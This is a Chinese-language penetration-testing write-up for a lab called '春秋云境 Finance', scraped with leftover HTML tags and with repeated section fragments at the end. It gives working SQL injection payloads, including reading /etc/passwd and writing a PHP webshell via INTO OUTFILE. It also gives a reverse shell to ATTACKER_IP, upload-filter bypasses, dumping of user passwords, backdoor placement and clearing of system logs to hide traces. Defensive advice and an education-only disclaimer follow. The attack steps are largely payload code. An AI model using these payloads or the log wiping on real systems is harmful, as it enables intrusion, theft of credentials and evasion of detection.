春秋云境 Finance WP 渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 目标识别<\/h3>

目标系统：春秋云境 Finance 平台<\/li>
识别开放端口和服务<\/li>

收集网站架构和技术栈信息<\/li> <\/ul>

1.2 目录扫描<\/h3>

使用工具进行目录爆破，发现敏感路径<\/li>

重点关注后台管理界面、API接口、配置文件等<\/li> <\/ul>

2. 漏洞发现与分析<\/h2>

2.1 SQL注入漏洞<\/h3>

漏洞位置<\/strong>：用户登录\/查询接口
利用方法<\/strong>：<\/p>

#<\/span> 基础注入检测<\/span>
<\/span><\/span>' OR 1=1 -- 
<\/span><\/span><\/span>'<\/span> UNION<\/span> SELECT<\/span> 1<\/span>,2<\/span>,3<\/span> -- 
<\/span><\/span><\/span><\/span>
<\/span><\/span>#<\/span> 数据库信息获取<\/span>
<\/span><\/span>' UNION SELECT version(),database(),user() -- 
<\/span><\/span><\/span>
<\/span><\/span><\/span># 表结构探测
<\/span><\/span><\/span>'<\/span> UNION<\/span> SELECT<\/span> table_name<\/span>,table_schema,3<\/span> FROM<\/span> information_schema.tables -- 
<\/span><\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p>

确认注入点是否存在过滤机制<\/li>
判断数据库类型（MySQL\/SQL Server\/Oracle）<\/li>
获取数据库版本和用户权限信息<\/li>
<\/ul>
2.2 文件上传漏洞<\/h3>
漏洞特征<\/strong>：<\/p>

文件类型检测不严格<\/li>
路径可预测或可访问<\/li>
上传目录有执行权限<\/li>
<\/ul>
绕过方法<\/strong>：<\/p>

修改Content-Type头<\/li>
使用双后缀名（.php.jpg）<\/li>
大小写变形（.Php, .pHp）<\/li>
空字节截断（.php%00.jpg）<\/li>
<\/ul>
2.3 敏感信息泄露<\/h3>
常见泄露点<\/strong>：<\/p>

备份文件（.bak, .swp, .git）<\/li>
配置文件（config.php, .env）<\/li>
日志文件<\/li>
版本控制文件<\/li>
<\/ul>
3. 权限提升技术<\/h2>
3.1 数据库权限利用<\/h3>
MySQL特定技巧<\/strong>：<\/p>
#<\/span> 读取系统文件<\/span>
<\/span><\/span>' UNION SELECT load_file('<\/span>\/<\/span>etc\/<\/span>passwd'),2,3 -- 
<\/span><\/span><\/span>
<\/span><\/span><\/span># 写入Webshell
<\/span><\/span><\/span>'<\/span> UNION<\/span> SELECT<\/span> "<?php system($_GET['cmd']); ?>"<\/span>,2<\/span>,3<\/span> INTO<\/span> OUTFILE '\/var\/www\/html\/shell.php'<\/span> -- 
<\/span><\/span><\/span><\/code><\/pre>权限要求<\/strong>：<\/p>

需要FILE权限<\/li>
知道Web目录绝对路径<\/li>
目录有写权限<\/li>
<\/ul>
3.2 系统命令执行<\/h3>
通过Webshell执行<\/strong>：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>\/\/ 基础命令执行
<\/span><\/span><\/span><\/span>system<\/span>($_GET['cmd'<\/span>]);
<\/span><\/span>
<\/span><\/span>\/\/ 反弹Shell
<\/span><\/span><\/span><\/span>exec<\/span>("\/bin\/bash -c 'bash -i >& \/dev\/tcp\/ATTACKER_IP\/PORT 0>&1'"<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>4. 内网渗透<\/h2>
4.1 网络探测<\/h3>
# 扫描内网网段<\/span>
<\/span><\/span>ifconfig
<\/span><\/span>ip route
<\/span><\/span>nmap 192.168.1.0\/24
<\/span><\/span>
<\/span><\/span># 端口扫描重点<\/span>
<\/span><\/span>22（SSH）, 3306（MySQL）, 6379（Redis）, 1433（MSSQL）
<\/span><\/span><\/code><\/pre>4.2 横向移动<\/h3>

密码重用攻击<\/li>
SSH密钥利用<\/li>
数据库连接利用<\/li>
<\/ul>
5. 数据获取与持久化<\/h2>
5.1 数据提取<\/h3>
数据库数据导出<\/strong>：<\/p>
#<\/span> 导出用户表数据<\/span>
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> users INTO<\/span> OUTFILE '\/tmp\/users.csv'<\/span>
<\/span><\/span>
<\/span><\/span>#<\/span> 或者直接查询显示<\/span>
<\/span><\/span>' UNION SELECT username,password,email FROM users -- 
<\/span><\/span><\/span><\/code><\/pre>5.2 后门部署<\/h3>
Web后门位置<\/strong>：<\/p>

Web根目录隐蔽位置<\/li>
图片马（结合文件包含漏洞）<\/li>
.htaccess文件修改<\/li>
<\/ul>
6. 痕迹清理<\/h2>
6.1 日志清理<\/h3>
Apache日志<\/strong>：\/var\/log\/apache2\/access.log

MySQL日志<\/strong>：清除相关查询记录

系统日志<\/strong>：\/var\/log\/auth.log, \/var\/log\/syslog<\/p>
6.2 文件清理<\/h3>

删除上传的Webshell<\/li>
清除临时文件<\/li>
恢复修改的配置文件<\/li>
<\/ul>
7. 防御建议<\/h2>
7.1 代码层面<\/h3>

所有用户输入进行严格过滤<\/li>
使用参数化查询防止SQL注入<\/li>
文件上传进行类型和内容检查<\/li>
<\/ul>
7.2 系统层面<\/h3>

最小权限原则运行服务<\/li>
定期更新系统和组件<\/li>
配置适当的防火墙规则<\/li>
<\/ul>
7.3 监控层面<\/h3>

部署WAF防护<\/li>
建立安全监控和告警机制<\/li>
定期进行安全审计<\/li>
<\/ul>
8. 工具推荐<\/h2>
8.1 信息收集<\/h3>

Nmap：端口扫描<\/li>
Dirb\/Dirsearch：目录扫描<\/li>
WhatWeb：CMS识别<\/li>
<\/ul>
8.2 漏洞利用<\/h3>

Sqlmap：自动化SQL注入<\/li>
Burp Suite：Web漏洞扫描<\/li>
Metasploit：漏洞利用框架<\/li>
<\/ul>
8.3 后渗透<\/h3>

Cobalt Strike：红队工具<\/li>
Mimikatz：密码提取<\/li>
Empire：内网渗透框架<\/li>
<\/ul>

注意<\/strong>：本文档仅用于教育目的，实际渗透测试需获得授权后进行。<\/p>

春秋云境 Finance WP 渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. 漏洞发现与分析<\/h2>

3. 权限提升技术<\/h2>

4. 内网渗透<\/h2>

5. 数据获取与持久化<\/h2>

6. 痕迹清理<\/h2>

6.1 日志清理<\/h3> Apache日志<\/strong>：\/var\/log\/apache2\/access.log MySQL日志<\/strong>：清除相关查询记录 系统日志<\/strong>：\/var\/log\/auth.log, \/var\/log\/syslog<\/p>

7. 防御建议<\/h2>

8. 工具推荐<\/h2>

8.3 后渗透<\/h3> Cobalt Strike：红队工具<\/li> Mimikatz：密码提取<\/li> Empire：内网渗透框架<\/li> <\/ul> 注意<\/strong>：本文档仅用于教育目的，实际渗透测试需获得授权后进行。<\/p>

6.1 日志清理<\/h3>
Apache日志<\/strong>：\/var\/log\/apache2\/access.log
MySQL日志<\/strong>：清除相关查询记录
系统日志<\/strong>：\/var\/log\/auth.log, \/var\/log\/syslog<\/p>

8.3 后渗透<\/h3>

Cobalt Strike：红队工具<\/li>
Mimikatz：密码提取<\/li>
Empire：内网渗透框架<\/li> <\/ul>

注意<\/strong>：本文档仅用于教育目的，实际渗透测试需获得授权后进行。<\/p>